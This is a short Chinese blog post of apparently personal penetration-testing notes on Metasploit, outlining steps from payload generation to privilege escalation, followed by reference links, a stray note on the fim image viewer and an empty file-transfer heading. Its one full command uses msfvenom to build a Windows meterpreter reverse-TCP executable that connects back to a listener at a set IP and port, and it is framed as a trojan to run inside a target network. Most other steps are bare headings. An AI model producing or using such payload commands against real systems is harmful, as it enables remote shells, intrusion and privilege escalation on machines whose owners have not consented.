metasploit渗透提权命令

1.msfvenom设置payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.194 LPORT=9999 -f exe > /home/kali/Desktop/shell.exe

2.msfconsole进行监听

 

3.执行内网中的木马

4.提权

参考文档

https://www.cnblogs.com/backlion/p/9484949.html       

https://blog.csdn.net/qq_27446553/article/details/78694465      

https://www.freebuf.com/articles/network/125278.html

https://zhuanlan.zhihu.com/p/114973728

apt-get install fim

fim test.png查看图片

----------------------------------------------------------------------

 

 

 ---------------------------------------------------------------------------------------

上传/下载文件

 

posted @ 2021-02-22 22:42  磐正  阅读(90)  评论(0)    收藏  举报